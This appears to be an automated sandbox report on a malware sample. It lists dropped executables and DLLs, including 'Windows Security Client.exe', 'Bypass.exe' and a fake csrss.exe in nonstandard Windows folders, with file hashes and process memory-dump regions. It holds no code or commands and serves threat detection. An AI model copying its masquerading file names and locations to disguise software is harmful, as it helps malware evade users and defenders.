C:\Users\Admin\Pictures\LljM0vX9AQyXiZhg9yD0OWIb.exe
Filesize
115KB

MD5
162f424633ca0fcd295bd6229c10a44a

SHA1
1768ebfeefe99170628d2252d5e03a9d17d26dfd

SHA256
e3f05c456a715f666dbea544e5a8025717549dd99a6fb118f7d86d67f6c98f45

SHA512
d087d5019c09b805918075ca648497f614a0749dcb6936bcc8025ab51b9e9bf8f0c04d21b25d7491226b6e8508dc5d8b9d6fec6f6f443386095f339c5ec518af

Download Submit
C:\Windows\SysWOW64\SubDir\Windows Security Client.exe
Filesize
335KB

MD5
cf98abea0702432934f4eb9c9e9517b2

SHA1
5946abf9f4bcba963dea349067826748d5e2187d

SHA256
6441bac5d5d5fcac4c9b3458187ccc450d110580652ec4353b4361bc7085e99a

SHA512
566aaae6859c78fa2f2f4079d0861c18078645ce89d0db0e0778d8e2f59e0b6b7d79115d2f7c9915bdbb52475a13baa5fadd3036007912b87fd70c5688196df1

Download Submit
C:\Windows\SysWOW64\SubDir\Windows Security Client.exe
Filesize
137KB

MD5
443234b2345ce3902f3e5140df31ab29

SHA1
d541152d7f5c834d113c1ea9ab583514818f729a

SHA256
48a6de4cebc7253af8d46dd40e385f9997a2c8931605d424fcbf500bfef9a189

SHA512
e2bee16bf5ce68ba255b3210ef75571754be47470c72b26cd2740dd2bfc23bf382e12a04cbd2cb2287f1c6fac33924d62cce85682a4e284ce4bdf87244b5d31a

Download Submit
C:\Windows\SysWOW64\SubDir\Windows Security Client.exe
Filesize
318KB

MD5
7ced88f27513c51ee3c159f2a2a802f7

SHA1
68aa20fe5d66e577722cbde8cfda05d467b77862

SHA256
3e23e1b5b1f512c1e277ecb87fac31de25d31d86f82813cf6284a5e42ebc6978

SHA512
dd462b04b39590f0af24ba26299e18126864a3e32464463add93b8e7792bb0309a75015f422e7ee13dd9feec9fea04fea6d1749a12121a14a09d6c2fc390a6c0

Download Submit
C:\Windows\System32\Bypass.exe
Filesize
320KB

MD5
d749478d503d1a9198fc0e6bc82874db

SHA1
eba5fa3eb6109081da86197abba6b4fb58d795f0

SHA256
60a47eb7ba4e85bac7406cd1a87bdc12b715fde62ecb6c6cf7a7c1cae3bbc2aa

SHA512
cdcf7be67467197164344ee3e372cc16595d646b00bae2220aeb00e4d162e04dcd3faf026b315415bab63da131a3a8875654db9e4598f7a32bd70118a4a03e1f

Download Submit
C:\Windows\rss\csrss.exe
Filesize
2.3MB

MD5
ab73abb10759021fee25edeb23040a85

SHA1
be35bf9f3635e5d621071eb1358d95cfa420abf6

SHA256
33c99ac8d441d1ae8bd290ba9280b536469f2abf8c288fb7972bbb08fff159ae

SHA512
87842c68d86e782c982b12537193db14b09263ff24231ded508eda033c4391d1949eec1ae54c1fecb4c79ffa488b1263e6b3a43dc526a66464913b81cbc7570b

Download Submit
C:\odt\ApplicationFrameHost.exe
Filesize
1.5MB

MD5
8ebfb00f97e5120227605496dee1ba2d

SHA1
3c225ff088d0fde20c4f2908363909dcc8efdc8c

SHA256
72ac498f8d99dd2b4c4c4f68a2c709c97dd3f397ac02be6ad1b5b874450c146e

SHA512
d9e566c6ca2db028dce7a7ee068bddd86ad2def9a8fe222af4be72e8618f08423b8bd81a9f709bc86c161b63fc9bade35138386d8cc3411a8fe23c5a84ce9328

Download Submit
\Users\Admin\AppData\Local\Temp\main\7z.dll
Filesize
342KB

MD5
08404b3f67226363f750df8707d5a4a4

SHA1
f6ba2a225c5afd06f41684e7802e8965211e743e

SHA256
bebbef24c4c61d13cbe013e68bdfb22874e7c0263a652764a8fa4d209472c912

SHA512
3799f83b77a65207b1fd5a007e8df807dd15f014eecd90f6a9117fae62fc28d0fc258d59054b29e3a7d85c9c6dde6af2f1f5e895ec02287570f064226c4a19b8

Download Submit
\Users\Admin\AppData\Local\Temp\main\7z.dll
Filesize
199KB

MD5
a3be9fa9d9023515a1f09c9e8a94b902

SHA1
6700fd41a1abab7931c7a2735705510d85a7f983

SHA256
6bf461b3530ce6acf2eb442bb74703968113377d7b8ce5abebd175dd2dfdbd2b

SHA512
6f0851c9eb34f171d8ddc3734c763058132b8e12859902a70771c2cec5740e7b3a0a6320edf0897f8c286dcbc01cd96959c2205902bd6bb89ff0002f71614ad4

Download Submit
\Users\Admin\AppData\Local\Temp\main\7z.dll
Filesize
410KB

MD5
f36d90d434d0dd9af8bc72fb0f652e40

SHA1
902ca7ad6017f4bc1ad44591b0df300a591deacd

SHA256
38cf39f7e97b37988777250dbbbd04d9ce35d570a662f53a0813a9a7a03efbcb

SHA512
1590c7a18df5e3b31521c4a21943c7c28764c57cc9faed51730e2e7559e78f30e82503ace8e176b5362647a017d2d0f990270903952f0dfd84802c99e9530a2c

Download Submit
\Users\Admin\AppData\Local\Temp\main\7z.dll
Filesize
478KB

MD5
3a00c42651732a0f1eb0ee214a7e0dd1

SHA1
393994470ce043b5a605aa4f02ec8afc605aa762

SHA256
2c2129998adf98c91d40145125ebef6fd53d6746b779d06b88a2e0ea39761a83

SHA512
8ed30bd08383385d001ce4c9c48bb313c16baba14429198b2689e606903b332e4ef84f394918bde6502916b2723e21c06d45e07011cfe6c480c61d40f91b7baf

Download Submit
\Users\Admin\AppData\Local\Temp\main\7z.dll
Filesize
465KB

MD5
e2cfe644382790d56b3c35ee6c148eb9

SHA1
d0b424d375358db50c10aae224079a2bf27b057a

SHA256
4d2d388664a90a5a83dd39f94c916f59a1dac5f1b95fa3be98047ba5c16939e4

SHA512
1df1c64506cdca3cf34878e4809d9baf06fad8bc112b60722aacc30ba3e887777354f0dc570299cc19205f13efa42524eb112ab0eb35c95def98396fe433e9e6

Download Submit
\Users\Admin\AppData\Local\Temp\main\7z.dll
Filesize
362KB

MD5
e3f16e2c5f65fa9d371414e5e8d5f85e

SHA1
fb0f61f33c7aefaa8b0478236f7c1b2c5858eeae

SHA256
5bef8eafd7db67d27e9fd932ab83a4f0f437af6647339f1a8159f23f83775dc4

SHA512
44852c6aa0453e22f73610e794c5f743b0b2b1eeb1b4bd490f24a2204381234d221df800101108bfc23cc3530d98a3e544456ee69c78595203123ee8007d0344

Download Submit
\Users\Admin\AppData\Local\Temp\main\7z.dll
Filesize
77KB

MD5
470a71c4c123d68ac67fb27a7fdefe89

SHA1
70b4925f6a8213928b6130990277c9595ece6763

SHA256
9a4ef55e406dd72a60e6a59492a06a313ca66004f57c7f38cb352f34e654938d

SHA512
2f011bdb51c67ede59ac8624a2b4db8101036f745aec4206c79ca5546ac030a83a99483265574b130f079cf88c762d2b53ad05d6c15419b2b71c6206b5aae0c8

Download Submit
\Users\Admin\AppData\Local\Temp\main\7z.dll
Filesize
116KB

MD5
b837483431fda5eaf450c40e18b5e414

SHA1
61ac79e1940245705302ea02116edf5dabff7430

SHA256
0c260d03fcd5b299d3016e8f9ec1f25c438c3a3af66023bdbccb85cd254a1b3e

SHA512
7dd9e71ca71b8fe2f305cc76986529961350adb8c7b01de7763291135e3de45a0b650cc1729cd89ccb912a8bb7d9db0a11bf2e862bb97533e89dd92aec53eb5e

Download Submit
memory/68-64-0x0000000073790000-0x0000000073E7E000-memory.dmp

Filesize
6.9MB

Download
memory/68-49-0x0000000004C20000-0x0000000004C30000-memory.dmp

Filesize
64KB

Download
memory/68-45-0x0000000004C30000-0x0000000004CC2000-memory.dmp

Filesize
584KB

Download
memory/68-50-0x0000000004C20000-0x0000000004C30000-memory.dmp

Filesize
64KB

Download
memory/68-65-0x00000000026D0000-0x00000000046D0000-memory.dmp

Filesize
32.0MB

Download
memory/68-46-0x0000000004B10000-0x0000000004BA0000-memory.dmp

Filesize
576KB

Download
memory/68-139-0x00000000026D0000-0x00000000046D0000-memory.dmp

Filesize
32.0MB

Download
memory/68-47-0x0000000073790000-0x0000000073E7E000-memory.dmp

Filesize
6.9MB

Download
memory/68-48-0x0000000004C20000-0x0000000004C30000-memory.dmp

Filesize
64KB

Download
memory/312-1156-0x0000000000400000-0x00000000004BD000-memory.dmp

Filesize
756KB

Download
memory/356-192-0x00007FFA03640000-0x00007FFA037AA000-memory.dmp

Filesize
1.4MB

Download
memory/356-38-0x00007FFA03640000-0x00007FFA037AA000-memory.dmp

Filesize
1.4MB

Download
memory/356-39-0x00007FFA03640000-0x00007FFA037AA000-memory.dmp

Filesize
1.4MB

Download
memory/356-36-0x00007FF6E80C0000-0x00007FF6E821F000-memory.dmp

Filesize
1.4MB

Download
memory/396-1151-0x0000000010000000-0x000000001001B000-memory.dmp

Filesize
108KB

Download
memory/396-1169-0x00000000042B0000-0x0000000004ED8000-memory.dmp

Filesize
12.2MB

Download
memory/396-1181-0x0000000002EE0000-0x0000000002F1A000-memory.dmp

Filesize
232KB

Download
memory/424-1188-0x0000000000400000-0x0000000000D1C000-memory.dmp

Filesize
9.1MB

Download
memory/432-367-0x0000000000400000-0x000000000048A000-memory.dmp

Filesize
552KB

Download
memory/432-140-0x0000000000720000-0x0000000000721000-memory.dmp

Filesize
4KB

Download
memory/432-861-0x0000000000400000-0x000000000048A000-memory.dmp

Filesize
552KB

Download
memory/1460-72-0x0000000000400000-0x0000000000483000-memory.dmp

Filesize
524KB

Download
memory/1460-144-0x0000000000BE0000-0x0000000000C20000-memory.dmp

Filesize
256KB

Download
memory/1460-54-0x0000000000400000-0x0000000000483000-memory.dmp

Filesize
524KB

Download
memory/1460-143-0x0000000000BE0000-0x0000000000C20000-memory.dmp

Filesize
256KB

Download
memory/1460-62-0x0000000000400000-0x0000000000483000-memory.dmp

Filesize
524KB

Download
memory/1460-145-0x0000000000BE0000-0x0000000000C20000-memory.dmp

Filesize
256KB

Download
memory/1460-148-0x0000000000400000-0x0000000000483000-memory.dmp

Filesize
524KB

Download
memory/1460-142-0x00000000007C0000-0x0000000000800000-memory.dmp

Filesize
256KB

Download
memory/1460-70-0x0000000000BE0000-0x0000000000C20000-memory.dmp

Filesize
256KB

Download
memory/1460-69-0x0000000000BE0000-0x0000000000C20000-memory.dmp

Filesize
256KB

Download
memory/1460-68-0x0000000000BE0000-0x0000000000C20000-memory.dmp

Filesize
256KB

Download
memory/1460-67-0x00000000007C0000-0x0000000000800000-memory.dmp

Filesize
256KB

Download
memory/1460-66-0x00000000007C0000-0x0000000000800000-memory.dmp

Filesize
256KB

Download
memory/1460-141-0x00000000007C0000-0x0000000000800000-memory.dmp

Filesize
256KB

Download
memory/2432-345-0x0000000000400000-0x0000000000408000-memory.dmp

Filesize
32KB

Download
memory/2556-560-0x0000000000400000-0x0000000000414000-memory.dmp

Filesize
80KB

Download
memory/2708-19-0x0000000004FC0000-0x000000000500B000-memory.dmp

Filesize
300KB

Download
memory/2708-10-0x0000000005270000-0x000000000576E000-memory.dmp

Filesize
5.0MB

Download
memory/2708-17-0x0000000004F20000-0x0000000004F32000-memory.dmp

Filesize
72KB

Download
memory/2708-90-0x0000000073790000-0x0000000073E7E000-memory.dmp

Filesize
6.9MB

Download
memory/2708-15-0x0000000005D80000-0x0000000006386000-memory.dmp

Filesize
6.0MB

Download
memory/2708-16-0x0000000005030000-0x000000000513A000-memory.dmp

Filesize
1.0MB

Download
memory/2708-9-0x0000000000400000-0x0000000000454000-memory.dmp

Filesize
336KB

Download
memory/2708-12-0x0000000004D70000-0x0000000004E02000-memory.dmp

Filesize
584KB

Download
memory/2708-94-0x0000000004CD0000-0x0000000004CE0000-memory.dmp

Filesize
64KB

Download
memory/2708-11-0x0000000073790000-0x0000000073E7E000-memory.dmp

Filesize
6.9MB

Download
memory/2708-18-0x0000000004F80000-0x0000000004FBE000-memory.dmp

Filesize
248KB

Download
memory/2708-14-0x0000000004CB0000-0x0000000004CBA000-memory.dmp

Filesize
40KB

Download
memory/2708-13-0x0000000004CD0000-0x0000000004CE0000-memory.dmp

Filesize
64KB

Download
memory/3008-52-0x0000000073790000-0x0000000073E7E000-memory.dmp

Filesize
6.9MB

Download
memory/3008-0-0x0000000000640000-0x0000000000648000-memory.dmp

Filesize
32KB

Download
memory/3008-3-0x0000000002A60000-0x0000000002A70000-memory.dmp

Filesize
64KB

Download
memory/3008-71-0x0000000002A60000-0x0000000002A70000-memory.dmp

Filesize
64KB

Download
memory/3008-2-0x0000000004EB0000-0x0000000004F4C000-memory.dmp

Filesize
624KB

Download
memory/3008-1-0x0000000073790000-0x0000000073E7E000-memory.dmp

Filesize
6.9MB

Download
memory/3020-893-0x0000000010000000-0x0000000010589000-memory.dmp

Filesize
5.5MB

Download
memory/3356-1019-0x00007FF7D7440000-0x00007FF7D77D8000-memory.dmp

Filesize
3.6MB

Download
memory/3408-105-0x00007FF9F2940000-0x00007FF9F332C000-memory.dmp

Filesize
9.9MB

Download
memory/3408-107-0x000000001BA50000-0x000000001BA60000-memory.dmp

Filesize
64KB

Download
memory/3580-120-0x00000000046C0000-0x0000000004AC0000-memory.dmp

Filesize
4.0MB

Download
memory/3580-125-0x00007FFA0F430000-0x00007FFA0F60B000-memory.dmp

Filesize
1.9MB

Download
memory/3580-124-0x0000000076BA0000-0x0000000076D62000-memory.dmp

Filesize
1.8MB

Download
memory/3580-117-0x0000000000990000-0x0000000000999000-memory.dmp

Filesize
36KB

Download
memory/3580-122-0x00000000046C0000-0x0000000004AC0000-memory.dmp

Filesize
4.0MB

Download
memory/3580-121-0x00007FFA0F430000-0x00007FFA0F60B000-memory.dmp

Filesize
1.9MB

Download
memory/3580-127-0x00000000046C0000-0x0000000004AC0000-memory.dmp

Filesize
4.0MB

Download
memory/3580-119-0x00000000046C0000-0x0000000004AC0000-memory.dmp

Filesize
4.0MB

Download
memory/3684-30-0x0000000000890000-0x0000000000891000-memory.dmp

Filesize
4KB

Download
memory/3684-164-0x0000000000400000-0x000000000071C000-memory.dmp

Filesize
3.1MB

Download
memory/3684-109-0x0000000000890000-0x0000000000891000-memory.dmp

Filesize
4KB

Download
memory/3864-859-0x00000000009F0000-0x0000000000F8A000-memory.dmp

Filesize
5.6MB

Download
memory/3888-294-0x0000000000400000-0x0000000000409000-memory.dmp

Filesize
36KB

Download
memory/3888-290-0x0000000000400000-0x0000000000409000-memory.dmp

Filesize
36KB

Download
memory/3928-321-0x00007FFA0F430000-0x00007FFA0F60B000-memory.dmp

Filesize
1.9MB

Download
memory/4064-24-0x0000000000400000-0x00000000004D8000-memory.dmp

Filesize
864KB

Download
memory/4064-106-0x0000000000400000-0x00000000004D8000-memory.dmp

Filesize
864KB

Download
memory/4752-104-0x00007FF9F2940000-0x00007FF9F332C000-memory.dmp

Filesize
9.9MB

Download
memory/4752-93-0x000000001B840000-0x000000001B8DE000-memory.dmp

Filesize
632KB

Download
memory/4752-91-0x0000000000CE0000-0x0000000000CE8000-memory.dmp

Filesize
32KB

Download
memory/4752-92-0x00007FF9F2940000-0x00007FF9F332C000-memory.dmp

Filesize
9.9MB

Download
memory/4752-95-0x000000001BA60000-0x000000001BA70000-memory.dmp

Filesize
64KB

Download
memory/4752-96-0x0000000002E80000-0x0000000002E92000-memory.dmp

Filesize
72KB

Download
memory/4752-97-0x0000000003010000-0x000000000304E000-memory.dmp

Filesize
248KB

Download
memory/5040-78-0x00000000020D0000-0x000000000215B000-memory.dmp

Filesize
556KB

Download
memory/5040-110-0x0000000003390000-0x0000000003790000-memory.dmp

Filesize
4.0MB

Download
memory/5040-111-0x00000000020D0000-0x000000000215B000-memory.dmp

Filesize
556KB

Download
memory/5040-113-0x00007FFA0F430000-0x00007FFA0F60B000-memory.dmp

Filesize
1.9MB

Download
memory/5040-115-0x0000000003390000-0x0000000003790000-memory.dmp

Filesize
4.0MB

Download
memory/5040-108-0x0000000003390000-0x0000000003790000-memory.dmp

Filesize
4.0MB

Download
memory/5040-116-0x0000000076BA0000-0x0000000076D62000-memory.dmp

Filesize
1.8MB

Download
memory/5040-126-0x0000000003390000-0x0000000003790000-memory.dmp

Filesize
4.0MB

Download
memory/5060-1183-0x0000000000400000-0x0000000000D1C000-memory.dmp

Filesize
9.1MB

Download
memory/5112-165-0x0000000007AA0000-0x00000000080C8000-memory.dmp

Filesize
6.2MB

Download
memory/5112-163-0x00000000052D0000-0x0000000005306000-memory.dmp

Filesize
216KB

Download